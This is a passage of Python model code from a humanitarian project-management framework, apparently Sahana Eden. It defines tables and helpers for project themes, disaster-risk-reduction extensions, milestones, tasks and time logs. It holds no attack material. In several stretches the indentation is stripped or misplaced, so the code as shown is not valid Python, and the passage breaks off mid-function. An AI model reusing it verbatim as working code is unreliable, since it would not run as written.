table = define_table(tablename,
theme_id(empty=False),
self.org_sector_id(label="",
empty=False),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Sector"),
title_display = T("Sector"),
title_list = T("Sectors"),
title_update = T("Edit Sector"),
title_search = T("Search Sectors"),
title_upload = T("Import Sector data"),
subtitle_create = T("Add New Sector"),
label_list_button = T("List Sectors"),
label_create_button = T("Add Sector to Theme"),
msg_record_created = T("Sector added to Theme"),
msg_record_modified = T("Sector updated"),
msg_record_deleted = T("Sector removed from Theme"),
msg_list_empty = T("No Sectors found for this Theme")
)
# ---------------------------------------------------------------------
# Theme - Project Link Table
#
tablename = "project_theme_project"
table = define_table(tablename,
theme_id(empty=False),
self.project_project_id(empty=False),
# % breakdown by theme (sector in IATI)
Field("percentage", "integer",
label = T("Percentage"),
default = 0,
requires = IS_INT_IN_RANGE(0, 101),
readable = theme_percentages,
writable = theme_percentages,
),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Theme"),
title_display = T("Theme"),
title_list = T("Themes"),
title_update = T("Edit Theme"),
title_search = T("Search Themes"),
#title_upload = T("Import Theme data"),
subtitle_create = T("Add New Theme"),
label_list_button = T("List Themes"),
label_create_button = T("Add Theme to Project"),
msg_record_created = T("Theme added to Project"),
msg_record_modified = T("Theme updated"),
msg_record_deleted = T("Theme removed from Project"),
msg_list_empty = T("No Themes found for this Project")
)
configure(tablename,
deduplicate=self.project_theme_project_deduplicate,
onaccept = self.project_theme_project_onaccept
)
# ---------------------------------------------------------------------
# Theme - Project Location Link Table
#
tablename = "project_theme_location"
table = define_table(tablename,
theme_id(empty=False),
self.project_location_id(empty=False),
# % breakdown by theme (sector in IATI)
Field("percentage", "integer",
label = T("Percentage"),
default = 0,
requires = IS_INT_IN_RANGE(0, 101),
readable = theme_percentages,
writable = theme_percentages,
),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Theme"),
title_display = T("Theme"),
title_list = T("Themes"),
title_update = T("Edit Theme"),
title_search = T("Search Themes"),
title_upload = T("Import Theme data"),
subtitle_create = T("Add New Theme"),
label_list_button = T("List Themes"),
label_create_button = T("Add Theme to Project Location"),
msg_record_created = T("Theme added to Project Location"),
msg_record_modified = T("Theme updated"),
msg_record_deleted = T("Theme removed from Project Location"),
msg_list_empty = T("No Themes found for this Project Location")
)
# Pass names back to global scope (s3.*)
return dict()
# -------------------------------------------------------------------------
@staticmethod
def project_theme_project_onaccept(form):
"""
Record creation post-processing
Update the percentages of all the Project's Locations.
"""
# Check for prepop
project_id = form.vars.get("project_id", None)
if not project_id and form.request_vars:
# Interactive form
project_id = form.request_vars.get("project_id", None)
if not project_id:
return
# Calculate the list of Percentages for this Project
percentages = {}
db = current.db
table = db.project_theme_project
query = (table.deleted == False) & \
(table.project_id == project_id)
rows = db(query).select(table.theme_id,
table.percentage)
for row in rows:
percentages[row.theme_id] = row.percentage
# Update the Project's Locations
s3db = current.s3db
table = s3db.project_location
ltable = s3db.project_theme_location
update_or_insert = ltable.update_or_insert
query = (table.deleted == False) & \
(table.project_id == project_id)
rows = db(query).select(table.id)
for row in rows:
for theme_id in percentages:
update_or_insert(project_location_id = row.id,
theme_id = theme_id,
percentage = percentages[theme_id])
# -------------------------------------------------------------------------
@staticmethod
def project_theme_project_deduplicate(item):
    """ Import item de-duplication """

    if item.tablename != "project_theme_project":
        return

    data = item.data
    # Both FKs are needed to identify an existing link
    if "project_id" not in data or "theme_id" not in data:
        return

    table = item.table
    query = (table.project_id == data.project_id) & \
            (table.theme_id == data.theme_id)
    existing = current.db(query).select(table.id,
                                        limitby=(0, 1)).first()
    if existing:
        # Update the existing link rather than inserting a duplicate
        item.id = existing.id
        item.method = item.METHOD.UPDATE
    return
# =============================================================================
class S3ProjectDRRModel(S3Model):
    """
        Models for DRR (Disaster Risk Reduction) extensions
    """

    names = ["project_drr"]

    def model(self):
        """ Define the project_drr table (one record per Project) """

        T = current.T

        # HFA: presumably Hyogo Framework for Action — TODO confirm
        project_hfa_opts = self.project_hfa_opts()
        # Label each option as "HFA <n>"
        hfa_opts = dict([(opt, "HFA %s" % opt) for opt in project_hfa_opts])

        tablename = "project_drr"
        self.define_table(tablename,
                          self.project_project_id(empty=False),
                          Field("hfa", "list:integer",
                                label = T("HFA Priorities"),
                                requires = IS_NULL_OR(IS_IN_SET(
                                            hfa_opts,
                                            multiple = True)),
                                widget = S3GroupedOptionsWidget(
                                            cols=1,
                                            help_field=project_hfa_opts
                                         ),
                                represent = S3Represent(options=hfa_opts,
                                                        multiple=True),
                                ),
                          *s3_meta_fields())

        # Pass names back to global scope (s3.*)
        return dict()

    # -------------------------------------------------------------------------
    @staticmethod
    def hfa_opts_represent(opt):
        """
            Option representation: render an HFA option (int) or a
            list of options as a comma-separated "HFA <n>" string
        """

        if not opt:
            # None, 0 or empty list
            return current.messages["NONE"]
        if isinstance(opt, int):
            # Normalise a single int to a list
            opts = [opt]
        elif not isinstance(opt, (list, tuple)):
            # Unexpected type
            return current.messages["NONE"]
        else:
            opts = opt
        if opts[0] is None:
            return current.messages["NONE"]
        vals = ["HFA %s" % o for o in opts]
        return ", ".join(vals)
# =============================================================================
class S3ProjectDRRPPModel(S3Model):
    """
        Models for DRR Project Portal extensions
        - injected into custom Project CRUD forms
    """

    names = ["project_drrpp"]

    def model(self):
        """ Define the project_drrpp table (one record per Project) """

        T = current.T
        db = current.db

        NONE = current.messages["NONE"]

        # Local currencies = configured currencies minus USD
        # (list() so this also works where .keys() returns a view)
        local_currencies = list(current.deployment_settings.get_fin_currencies().keys())
        if "USD" in local_currencies:
            # Guard: deployments without USD configured used to crash here
            local_currencies.remove("USD")

        project_rfa_opts = self.project_rfa_opts()
        project_pifacc_opts = self.project_pifacc_opts()
        project_jnap_opts = self.project_jnap_opts()

        tablename = "project_drrpp"
        self.define_table(tablename,
                          self.project_project_id(
                            # Override requires so that update access to the projects isn't required
                            requires = IS_ONE_OF(db, "project_project.id",
                                                 self.project_project_represent
                                                 )
                            ),
                          Field("parent_project",
                                represent = lambda v: v or NONE,
                                label = T("Name of a programme or another project which this project is implemented as part of"),
                                #comment = DIV(_class="tooltip",
                                #              _title="%s|%s" % (T("Parent Project"),
                                #                                T("The parent project or programme which this project is implemented under"))),
                                ),
                          Field("duration", "integer",
                                represent = lambda v: v or NONE,
                                label = T("Duration (months)")),
                          Field("local_budget", "double",
                                label = T("Total Funding (Local Currency)"),
                                represent = lambda v: \
                                    IS_FLOAT_AMOUNT.represent(v, precision=2)),
                          s3_currency("local_currency",
                                      label = T("Local Currency"),
                                      requires = IS_IN_SET(local_currencies,
                                                           zero=None)
                                      ),
                          Field("activities", "text",
                                represent = lambda v: v or NONE,
                                label = T("Activities")),
                          # RFA Priorities (Pacific projects only)
                          Field("rfa", "list:integer",
                                label = T("RFA Priorities"),
                                requires = IS_NULL_OR(
                                            IS_IN_SET(project_rfa_opts.keys(),
                                                      labels = ["RFA %s" % \
                                                                rfa for rfa in project_rfa_opts.keys()],
                                                      multiple = True)),
                                represent = lambda opt: \
                                    self.opts_represent(opt, "RFA"),
                                widget = lambda f, v, **attr: \
                                    s3_grouped_checkboxes_widget(f, v,
                                                                 help_field=project_rfa_opts,
                                                                 **attr),
                                comment = DIV(_class="tooltip",
                                              _title="%s|%s" % (T("RFA Priorities"),
                                                                T("Applicable to projects in Pacific countries only")))),
                          # PIFACC Priorities (Pacific projects only)
                          Field("pifacc", "list:integer",
                                label = T("PIFACC Priorities"),
                                requires = IS_NULL_OR(
                                            IS_IN_SET(project_pifacc_opts.keys(),
                                                      labels = ["PIFACC %s" % \
                                                                pifacc for pifacc in project_pifacc_opts.keys()],
                                                      multiple = True)),
                                represent = lambda opt: \
                                    self.opts_represent(opt, "PIFACC"),
                                widget = lambda f, v, **attr: \
                                    s3_grouped_checkboxes_widget(f, v,
                                                                 help_field=project_pifacc_opts,
                                                                 **attr),
                                comment = DIV(_class="tooltip",
                                              _title="%s|%s" % (T("PIFACC Priorities"),
                                                                T("Pacific Islands Framework for Action on Climate Change. Applicable to projects in Pacific countries only")))),
                          # JNAP Priorities (Cook Islands only)
                          Field("jnap", "list:integer",
                                label = T("JNAP Priorities"),
                                requires = IS_NULL_OR(
                                            IS_IN_SET(project_jnap_opts.keys(),
                                                      labels = ["JNAP %s" % \
                                                                jnap for jnap in project_jnap_opts.keys()],
                                                      multiple = True)),
                                represent = lambda opt: \
                                    self.opts_represent(opt, "JNAP"),
                                widget = lambda f, v, **attr: \
                                    s3_grouped_checkboxes_widget(f, v,
                                                                 help_field=project_jnap_opts,
                                                                 **attr),
                                comment = DIV(_class="tooltip",
                                              _title="%s|%s" % (T("JNAP Priorities"),
                                                                T("Joint National Action Plan for Disaster Risk Management and Climate Change Adaptation. Applicable to Cook Islands only")))),
                          # L1 locations within the Cook Islands
                          Field("L1", "list:integer",
                                label = T("Cook Islands"),
                                requires = IS_NULL_OR(
                                            IS_ONE_OF(db, "gis_location.id",
                                                      S3Represent(lookup="gis_location"),
                                                      filterby = "L0",
                                                      filter_opts = ["Cook Islands"],
                                                      not_filterby = "name",
                                                      not_filter_opts = ["Cook Islands"],
                                                      multiple=True)),
                                represent = S3Represent(lookup="gis_location",
                                                        multiple=True),
                                widget = lambda f, v, **attr: \
                                    s3_checkboxes_widget(f, v, cols=4, **attr),
                                ),
                          # Deprecated field, kept for old data
                          Field("outputs", "text",
                                label = "%s (Old - do NOT use)" % T("Outputs"),
                                represent = lambda v: v or NONE,
                                readable = False,
                                writable = False,
                                ),
                          # Focal person details are maintained automatically
                          # from the Project's contact person (see onaccept)
                          Field("focal_person",
                                represent = lambda v: v or NONE,
                                requires = IS_NOT_EMPTY(),
                                label = T("Focal Person")),
                          self.org_organisation_id(label = T("Organization")),
                          Field("email",
                                requires=IS_NULL_OR(IS_EMAIL()),
                                represent = lambda v: v or NONE,
                                label = T("Email")),
                          *s3_meta_fields())

        # CRUD Strings
        current.response.s3.crud_strings[tablename] = Storage(
            title_display = T("DRRPP Extensions"),
            title_update = T("Edit DRRPP Extensions"),
        )

        self.configure(tablename,
                       onaccept = self.project_drrpp_onaccept,
                       )

        # Pass names back to global scope (s3.*)
        return dict()

    # -------------------------------------------------------------------------
    @staticmethod
    def project_drrpp_onaccept(form):
        """
            After DB I/O tasks for Project DRRPP records:
            populate focal_person, organisation_id & email from the
            Project's contact person (human_resource_id)
        """

        db = current.db
        vars = form.vars
        id = vars.id
        project_id = vars.project_id

        dtable = db.project_drrpp

        if not project_id:
            # Most reliable way to get the project_id is to read the record
            project_id = db(dtable.id == id).select(dtable.project_id,
                                                    limitby=(0, 1)
                                                    ).first().project_id

        table = db.project_project
        hr_id = db(table.id == project_id).select(table.human_resource_id,
                                                  limitby=(0, 1)
                                                  ).first().human_resource_id
        if hr_id:
            s3db = current.s3db
            htable = db.hrm_human_resource
            ctable = s3db.pr_contact
            ptable = db.pr_person
            query = (htable.id == hr_id) & \
                    (ptable.id == htable.person_id)
            # Left join the EMAIL contact (may be absent)
            left = ctable.on((ctable.pe_id == ptable.pe_id) & \
                             (ctable.contact_method == "EMAIL"))
            row = db(query).select(htable.organisation_id,
                                   ptable.first_name,
                                   ptable.middle_name,
                                   ptable.last_name,
                                   ctable.value,
                                   left=left,
                                   limitby=(0, 1)).first()
            focal_person = s3_fullname(row[ptable])
            organisation_id = row[htable].organisation_id
            email = row[ctable].value
            db(dtable.id == id).update(focal_person = focal_person,
                                       organisation_id = organisation_id,
                                       email = email,
                                       )

    # -------------------------------------------------------------------------
    @staticmethod
    def opts_represent(opt, prefix):
        """
            Option representation for RFA/PIFACC/JNAP multi-selects

            @param opt: the stored value (int, or list/tuple of ints)
            @param prefix: the label prefix, e.g. "RFA"
        """

        if isinstance(opt, int):
            # Fix: a single int previously fell through to the else-branch
            # below and was rendered as NONE
            opt = [opt]
        if isinstance(opt, (list, tuple)):
            if not opt or opt[0] is None:
                return current.messages["NONE"]
            else:
                return ", ".join(["%s %s" % (prefix, o) for o in opt])
        else:
            return current.messages["NONE"]
# =============================================================================
class S3ProjectTaskModel(S3Model):
"""
Project Task Model
This class holds the tables used for an Organisation to manage
their Tasks in detail.
"""
names = ["project_milestone",
"project_task",
"project_task_id",
"project_time",
"project_comment",
"project_task_project",
"project_task_activity",
"project_task_milestone",
"project_task_represent_w_project",
]
def model(self):
    """
        Define the Task-related tables: project_milestone, project_task,
        the Task link tables (project/activity/milestone), project_comment
        and project_time — and return public names for the global scope
    """

    db = current.db
    T = current.T
    auth = current.auth
    request = current.request

    project_id = self.project_project_id

    messages = current.messages
    UNKNOWN_OPT = messages.UNKNOWN_OPT

    # Shortcuts
    add_component = self.add_component
    configure = self.configure
    crud_strings = current.response.s3.crud_strings
    define_table = self.define_table
    set_method = self.set_method
    super_link = self.super_link

    # ---------------------------------------------------------------------
    # Project Milestone
    #
    tablename = "project_milestone"
    table = define_table(tablename,
                         # Stage Report
                         super_link("doc_id", "doc_entity"),
                         project_id(),
                         Field("name",
                               label = T("Short Description"),
                               requires=IS_NOT_EMPTY()),
                         s3_date(),
                         s3_comments(),
                         *s3_meta_fields())

    # CRUD Strings
    ADD_MILESTONE = T("Add Milestone")
    crud_strings[tablename] = Storage(
        title_create = ADD_MILESTONE,
        title_display = T("Milestone Details"),
        title_list = T("Milestones"),
        title_update = T("Edit Milestone"),
        title_search = T("Search Milestones"),
        #title_upload = T("Import Milestones"),
        subtitle_create = T("Add New Milestone"),
        label_list_button = T("List Milestones"),
        label_create_button = ADD_MILESTONE,
        msg_record_created = T("Milestone Added"),
        msg_record_modified = T("Milestone Updated"),
        msg_record_deleted = T("Milestone Deleted"),
        msg_list_empty = T("No Milestones Found")
    )

    # Reusable Field
    represent = S3Represent(lookup=tablename,
                            fields=["name", "date"],
                            labels="%(name)s: %(date)s",
                            )
    milestone_id = S3ReusableField("milestone_id", table,
                                   sortby="name",
                                   requires = IS_NULL_OR(
                                                IS_ONE_OF(db, "project_milestone.id",
                                                          represent)),
                                   represent = represent,
                                   comment = S3AddResourceLink(c="project",
                                                               f="milestone",
                                                               title=ADD_MILESTONE,
                                                               tooltip=T("A project milestone marks a significant date in the calendar which shows that progress towards the overall objective is being made.")),
                                   label = T("Milestone"),
                                   ondelete = "RESTRICT")

    configure(tablename,
              orderby=table.date,
              )

    # ---------------------------------------------------------------------
    # Tasks
    #
    # Tasks can be linked to Activities or directly to Projects
    # - they can also be used by the Event/Scenario modules
    #
    # @ToDo: Task templates
    # @ToDo: Recurring tasks
    #
    # These Statuses can be customised, although doing so limits the ability to do synchronization
    # - best bet is simply to comment statuses that you don't wish to use
    #
    project_task_status_opts = {
        1: T("Draft"),
        2: T("New"),
        3: T("Assigned"),
        4: T("Feedback"),
        5: T("Blocked"),
        6: T("On Hold"),
        7: T("Canceled"),
        8: T("Duplicate"),
        9: T("Ready"),
        10: T("Verified"),
        11: T("Reopened"),
        12: T("Completed"),
        #99: T("unspecified")
    }

    # Statuses considered "open" (see project_task_onvalidation for 2/3)
    project_task_active_statuses = [2, 3, 4, 11]

    project_task_priority_opts = {
        1:T("Urgent"),
        2:T("High"),
        3:T("Normal"),
        4:T("Low")
    }

    #staff = auth.s3_has_role("STAFF")
    staff = True

    settings = current.deployment_settings

    tablename = "project_task"
    table = define_table(tablename,
                         super_link("doc_id", "doc_entity"),
                         Field("template", "boolean",
                               default=False,
                               readable=False,
                               writable=False),
                         Field("name",
                               label = T("Short Description"),
                               length=100,
                               notnull=True,
                               requires = IS_LENGTH(maxsize=100, minsize=1)),
                         Field("description", "text",
                               label = T("Detailed Description/URL"),
                               comment = DIV(_class="tooltip",
                                             _title="%s|%s" % (T("Detailed Description/URL"),
                                                               T("Please provide as much detail as you can, including the URL(s) where the bug occurs or you'd like the new feature to go.")))),
                         self.org_site_id,
                         self.gis_location_id(
                            label=T("Deployment Location"),
                            readable=False,
                            writable=False
                            ),
                         Field("source",
                               label = T("Source")),
                         Field("priority", "integer",
                               requires = IS_IN_SET(project_task_priority_opts,
                                                    zero=None),
                               default = 3,
                               label = T("Priority"),
                               represent = lambda opt: \
                                   project_task_priority_opts.get(opt,
                                                                  UNKNOWN_OPT)),
                         # Could be a Person, Team or Organisation
                         super_link("pe_id", "pr_pentity",
                                    readable = staff,
                                    writable = staff,
                                    label = T("Assigned to"),
                                    filterby = "instance_type",
                                    filter_opts = ["pr_person", "pr_group", "org_organisation"],
                                    represent = self.project_assignee_represent,
                                    # @ToDo: Widget
                                    #widget = S3PentityWidget(),
                                    #comment = DIV(_class="tooltip",
                                    #              _title="%s|%s" % (T("Assigned to"),
                                    #                                T("Enter some characters to bring up a list of possible matches")))
                                    ),
                         s3_datetime("date_due",
                                     label = T("Date Due"),
                                     past=0,
                                     future=8760,  # Hours, so 1 year
                                     represent="date",
                                     readable = staff,
                                     writable = staff,
                                     ),
                         Field("time_estimated", "double",
                               readable = staff,
                               writable = staff,
                               represent = lambda v: v or "",
                               label = "%s (%s)" % (T("Time Estimate"),
                                                    T("hours"))),
                         Field("time_actual", "double",
                               readable = staff,
                               # This comes from the Time component
                               writable=False,
                               label = "%s (%s)" % (T("Time Taken"),
                                                    T("hours"))),
                         Field("status", "integer",
                               requires = IS_IN_SET(project_task_status_opts,
                                                    zero=None),
                               default = 2,
                               readable = staff,
                               writable = staff,
                               label = T("Status"),
                               represent = lambda opt: \
                                   project_task_status_opts.get(opt,
                                                                UNKNOWN_OPT)),
                         *s3_meta_fields())

    # Virtual field
    table.task_id = Field.Lazy(self.project_task_task_id)

    # Field configurations
    # Comment these if you don't need a Site associated with Tasks
    #table.site_id.readable = table.site_id.writable = True
    #table.site_id.label = T("Check-in at Facility") # T("Managing Office")
    table.created_on.represent = lambda dt: \
        S3DateTime.date_represent(dt, utc=True)

    # CRUD Strings
    ADD_TASK = T("Add Task")
    crud_strings[tablename] = Storage(
        title_create = ADD_TASK,
        title_display = T("Task Details"),
        title_list = T("Tasks"),
        title_update = T("Edit Task"),
        title_search = T("Search Tasks"),
        title_upload = T("Import Tasks"),
        subtitle_create = T("Add New Task"),
        label_list_button = T("List Tasks"),
        label_create_button = ADD_TASK,
        msg_record_created = T("Task added"),
        msg_record_modified = T("Task updated"),
        msg_record_deleted = T("Task deleted"),
        msg_list_empty = T("No tasks currently registered"))

    # Search Method
    filter_widgets = [
        S3TextFilter(["name",
                      "description",
                      ],
                     label=T("Description"),
                     _class="filter-search",
                     ),
        S3OptionsFilter("priority",
                        label=T("Priority"),
                        #represent="%(name)s",
                        #widget="multiselect",
                        options=project_task_priority_opts,
                        cols=4,
                        ),
        S3OptionsFilter("task_project.project_id",
                        label=T("Project"),
                        options = self.project_task_project_opts,
                        #represent="%(name)s",
                        #widget="multiselect",
                        cols=3,
                        ),
        S3OptionsFilter("task_activity.activity_id",
                        label=T("Activity"),
                        options = self.project_task_activity_opts,
                        #represent="%(name)s",
                        #widget="multiselect",
                        cols=3,
                        ),
        S3OptionsFilter("pe_id",
                        label=T("Assigned To"),
                        # @ToDo: Implement support for this in S3OptionsFilter
                        #null = T("Unassigned"),
                        #represent="%(name)s",
                        #widget="multiselect",
                        cols=4,
                        ),
        S3OptionsFilter("created_by",
                        label=T("Created By"),
                        #widget="multiselect",
                        cols=3,
                        hidden=True,
                        ),
        S3RangeFilter("created_on",
                      label=T("Date Created"),
                      hide_time=True,
                      hidden=True,
                      ),
        S3RangeFilter("date_due",
                      label=T("Date Due"),
                      hide_time=True,
                      hidden=True,
                      ),
        S3RangeFilter("modified_on",
                      label=T("Date Modified"),
                      hide_time=True,
                      hidden=True,
                      ),
        S3OptionsFilter("status",
                        label=T("Status"),
                        options=project_task_status_opts,
                        #represent="%(name)s",
                        #widget="multiselect",
                        cols=4,
                        ),
        ]

    list_fields=["id",
                 (T("ID"), "task_id"),
                 "priority",
                 "name",
                 "pe_id",
                 "date_due",
                 "time_estimated",
                 "time_actual",
                 "created_on",
                 "status",
                 #"site_id"
                 ]

    if settings.get_project_milestones():
        # Use the field in this format to get the custom represent
        list_fields.insert(5, (T("Milestone"), "task_milestone.milestone_id"))
        filter_widgets.insert(4, S3OptionsFilter("task_milestone.milestone_id",
                                                 label = T("Milestone"),
                                                 options = self.project_task_milestone_opts,
                                                 cols = 3
                                                 ))

    report_options = Storage(rows = list_fields,
                             cols = list_fields,
                             fact = list_fields,
                             defaults = Storage(rows = "task.project",
                                                cols = "task.pe_id",
                                                fact = "sum(task.time_estimated)",
                                                totals = True
                                                ),
                             )

    # Custom Form
    crud_form = S3SQLCustomForm(
                    "name",
                    "description",
                    "source",
                    "priority",
                    "pe_id",
                    "date_due",
                    "time_estimated",
                    "status",
                    S3SQLInlineComponent(
                        "time",
                        label = T("Time Log"),
                        fields = ["date",
                                  "person_id",
                                  "hours",
                                  "comments"
                                  ],
                        orderby = "date"
                    ),
                    "time_actual",
                )

    # Resource Configuration
    configure(tablename,
              super_entity = "doc_entity",
              copyable = True,
              orderby = "project_task.priority,project_task.date_due asc",
              realm_entity = self.project_task_realm_entity,
              onvalidation = self.project_task_onvalidation,
              #create_next = URL(f="task", args=["[id]"]),
              create_onaccept = self.project_task_create_onaccept,
              update_onaccept = self.project_task_update_onaccept,
              filter_widgets = filter_widgets,
              report_options = report_options,
              list_fields = list_fields,
              extra_fields = ["id"],
              crud_form = crud_form,
              extra = "description"
              )

    # Reusable field
    task_id = S3ReusableField("task_id", table,
                              label = T("Task"),
                              sortby="name",
                              requires = IS_NULL_OR(
                                            IS_ONE_OF(db, "project_task.id",
                                                      self.project_task_represent)),
                              represent = self.project_task_represent,
                              comment = S3AddResourceLink(c="project",
                                                          f="task",
                                                          title=ADD_TASK,
                                                          tooltip=T("A task is a piece of work that an individual or team can do in 1-2 days.")),
                              ondelete = "CASCADE")

    # Custom Methods
    set_method("project", "task",
               method="dispatch",
               action=self.project_task_dispatch)

    # Components
    # Projects (for imports)
    add_component("project_project",
                  project_task=dict(link="project_task_project",
                                    joinby="task_id",
                                    key="project_id",
                                    actuate="embed",
                                    autocomplete="name",
                                    autodelete=False))

    # Activities
    add_component("project_activity",
                  project_task=dict(link="project_task_activity",
                                    joinby="task_id",
                                    key="activity_id",
                                    actuate="embed",
                                    autocomplete="name",
                                    autodelete=False))

    # Milestones
    add_component("project_milestone",
                  project_task=dict(link="project_task_milestone",
                                    joinby="task_id",
                                    key="milestone_id",
                                    actuate="embed",
                                    autocomplete="name",
                                    autodelete=False))

    # Job titles
    add_component("hrm_job_title",
                  project_task=dict(link="project_task_job_title",
                                    joinby="task_id",
                                    key="job_title_id",
                                    actuate="embed",
                                    autocomplete="name",
                                    autodelete=False))

    # Human Resources (assigned)
    add_component("hrm_human_resource",
                  project_task=dict(link="project_task_human_resource",
                                    joinby="task_id",
                                    key="human_resource_id",
                                    actuate="embed",
                                    autocomplete="name",
                                    autodelete=False))

    # Requests
    add_component("req_req",
                  project_task=dict(link="project_task_req",
                                    joinby="task_id",
                                    key="req_id",
                                    actuate="embed",
                                    autocomplete="request_number",
                                    autodelete=False))

    # Time
    add_component("project_time", project_task="task_id")

    # Comments (for imports)
    add_component("project_comment", project_task="task_id")

    # ---------------------------------------------------------------------
    # Link Tasks <-> Projects
    #
    tablename = "project_task_project"
    table = define_table(tablename,
                         task_id(),
                         project_id(
                            # Override requires so that update access to the projects isn't required
                            requires = IS_ONE_OF(db, "project_project.id",
                                                 self.project_project_represent
                                                 )
                            ),
                         *s3_meta_fields())

    # ---------------------------------------------------------------------
    # Link task <-> activity
    #
    # Tasks <> Activities
    tablename = "project_task_activity"
    table = define_table(tablename,
                         task_id(),
                         self.project_activity_id(),
                         *s3_meta_fields())

    # ---------------------------------------------------------------------
    # Link task <-> milestone
    #
    # Tasks <> Milestones
    tablename = "project_task_milestone"
    table = define_table(tablename,
                         task_id(),
                         milestone_id(),
                         *s3_meta_fields())

    # ---------------------------------------------------------------------
    # Project comment
    #
    # @ToDo: Attachments?
    #
    # Parent field allows us to:
    #  * easily filter for top-level threads
    #  * easily filter for next level of threading
    #  * hook a new reply into the correct location in the hierarchy
    #
    tablename = "project_comment"
    table = define_table(tablename,
                         Field("parent", "reference project_comment",
                               requires = IS_EMPTY_OR(
                                            IS_ONE_OF(db, "project_comment.id"
                                            )),
                               readable=False),
                         task_id(),
                         Field("body", "text",
                               notnull=True,
                               label = T("Comment")),
                         *s3_meta_fields())

    # Resource Configuration
    configure(tablename,
              list_fields=["id",
                           "task_id",
                           "created_by",
                           "modified_on"
                           ])

    # ---------------------------------------------------------------------
    # Project Time
    # - used to Log hours spent on a Task
    #
    tablename = "project_time"
    table = define_table(tablename,
                         task_id(
                            requires = IS_ONE_OF(db, "project_task.id",
                                                 self.project_task_represent_w_project,
                                                 ),
                            ),
                         self.pr_person_id(default=auth.s3_logged_in_person(),
                                           widget = SQLFORM.widgets.options.widget
                                           ),
                         s3_datetime(default="now",
                                     past=8760,  # Hours, so 1 year
                                     future=0
                                     ),
                         Field("hours", "double",
                               label = "%s (%s)" % (T("Time"),
                                                    T("hours")),
                               represent=lambda v: \
                                   IS_FLOAT_AMOUNT.represent(v, precision=2)),
                         s3_comments(),
                         *s3_meta_fields())

    # CRUD Strings
    ADD_TIME = T("Log Time Spent")
    crud_strings[tablename] = Storage(
        title_create = ADD_TIME,
        title_display = T("Logged Time Details"),
        title_list = T("Logged Time"),
        title_update = T("Edit Logged Time"),
        title_search = T("Search Logged Time"),
        title_upload = T("Import Logged Time data"),
        title_report = T("Project Time Report"),
        subtitle_create = T("Log New Time"),
        label_list_button = T("List Logged Time"),
        label_create_button = ADD_TIME,
        msg_record_created = T("Time Logged"),
        msg_record_modified = T("Time Log Updated"),
        msg_record_deleted = T("Time Log Deleted"),
        msg_list_empty = T("No Time Logged")
    )
    if "rows" in request.get_vars and request.get_vars.rows == "project":
        crud_strings[tablename].title_report = T("Project Time Report")

    list_fields = ["id",
                   (T("Project"), "task_id$task_project.project_id"),
                   (T("Activity"), "task_id$task_activity.activity_id"),
                   "task_id",
                   "person_id",
                   "date",
                   "hours",
                   "comments",
                   ]

    # Virtual Fields
    table.day = Field.Lazy(project_time_day)
    table.week = Field.Lazy(project_time_week)

    filter_widgets = [
        S3OptionsFilter("person_id",
                        label=T("Person"),
                        #represent="%(name)s",
                        #widget="multiselect",
                        cols=3,
                        ),
        S3OptionsFilter("task_id$task_project.project_id",
                        label=T("Project"),
                        options = self.project_task_project_opts,
                        #represent="%(name)s",
                        #widget="multiselect",
                        cols=3,
                        ),
        S3OptionsFilter("task_id$task_activity.activity_id",
                        label=T("Activity"),
                        options = self.project_task_activity_opts,
                        #represent="%(name)s",
                        #widget="multiselect",
                        cols=3,
                        hidden=True,
                        ),
        S3DateFilter("date",
                     label=T("Date"),
                     hide_time=True,
                     hidden=True,
                     ),
        ]

    if settings.get_project_milestones():
        # Use the field in this format to get the custom represent
        list_fields.insert(3, (T("Milestone"), "task_id$task_milestone.milestone_id"))
        filter_widgets.insert(3, S3OptionsFilter("task_id$task_milestone.milestone_id",
                                                 label = T("Milestone"),
                                                 cols = 3,
                                                 hidden = True,
                                                 ))

    report_fields = list_fields + \
                    [(T("Day"), "day"),
                     (T("Week"), "week")]

    if settings.get_project_sectors():
        report_fields.insert(3, (T("Sector"),
                                 "task_id$task_project.project_id$sector_project.sector_id"))
        def get_sector_opts():
            stable = self.org_sector
            rows = db(stable.deleted == False).select(stable.id, stable.name)
            sector_opts = {}
            for row in rows:
                sector_opts[row.id] = row.name
            return sector_opts
        filter_widgets.insert(1, S3OptionsFilter("task_id$task_project.project_id$sector_project.sector_id",
                                                 label = T("Sector"),
                                                 options = get_sector_opts,
                                                 cols = 3,
                                                 ))

    # Custom Methods
    set_method("project", "time",
               method="effort",
               action=self.project_time_effort_report)

    configure(tablename,
              onaccept=self.project_time_onaccept,
              filter_widgets=filter_widgets,
              report_fields=["date"],
              report_options=Storage(
                rows=report_fields,
                cols=report_fields,
                fact=report_fields,
                defaults=Storage(
                    rows="task_id$task_project.project_id",
                    cols="person_id",
                    fact="sum(hours)",
                    totals=True
                ),
              ),
              list_fields=list_fields
              )

    # ---------------------------------------------------------------------
    # Pass names back to global scope (s3.*)
    #
    return dict(
        project_task_id = task_id,
        project_task_active_statuses = project_task_active_statuses,
        project_task_represent_w_project = self.project_task_represent_w_project,
    )
# -------------------------------------------------------------------------
def defaults(self):
    """ Safe defaults for model-global names if the module is disabled """

    placeholder = S3ReusableField("dummy_id", "integer",
                                  readable=False,
                                  writable=False)

    defaults = {"project_task_id": lambda: placeholder("task_id"),
                "project_task_active_statuses": [],
                }
    return defaults
# -------------------------------------------------------------------------
@staticmethod
def project_task_task_id(row):
""" The record ID of a task as separate column in the data table """
if hasattr(row, "project_task"):
row = row.project_task
try:
return row.id
except AttributeError:
return None
# -------------------------------------------------------------------------
@staticmethod
def project_task_project_opts():
    """
        Provide the options for the Project search filter
        - all Projects with Tasks
    """

    db = current.db
    ttable = db.project_task
    ltable = db.project_task_project
    ptable = db.project_project
    query = (ttable.deleted != True) & \
            (ltable.task_id == ttable.id) & \
            (ltable.project_id == ptable.id)
    projects = db(query).select(ptable.id, ptable.name)
    return {row.id: row.name for row in projects}
# -------------------------------------------------------------------------
@staticmethod
def project_task_activity_opts():
    """
        Provide the options for the Activity search filter
        - all Activities with Tasks
    """

    db = current.db
    atable = db.project_activity
    ttable = db.project_task
    ltable = db.project_task_activity
    query = (ttable.deleted == False) & \
            (ltable.task_id == ttable.id) & \
            (ltable.activity_id == atable.id)
    activities = db(query).select(atable.name)
    # Keyed by name rather than ID (matches original behaviour)
    return {row.name: row.name for row in activities}
# -------------------------------------------------------------------------
@staticmethod
def project_task_milestone_opts():
    """
        Provide the options for the Milestone search filter
        - all Milestones with Tasks
    """

    db = current.db
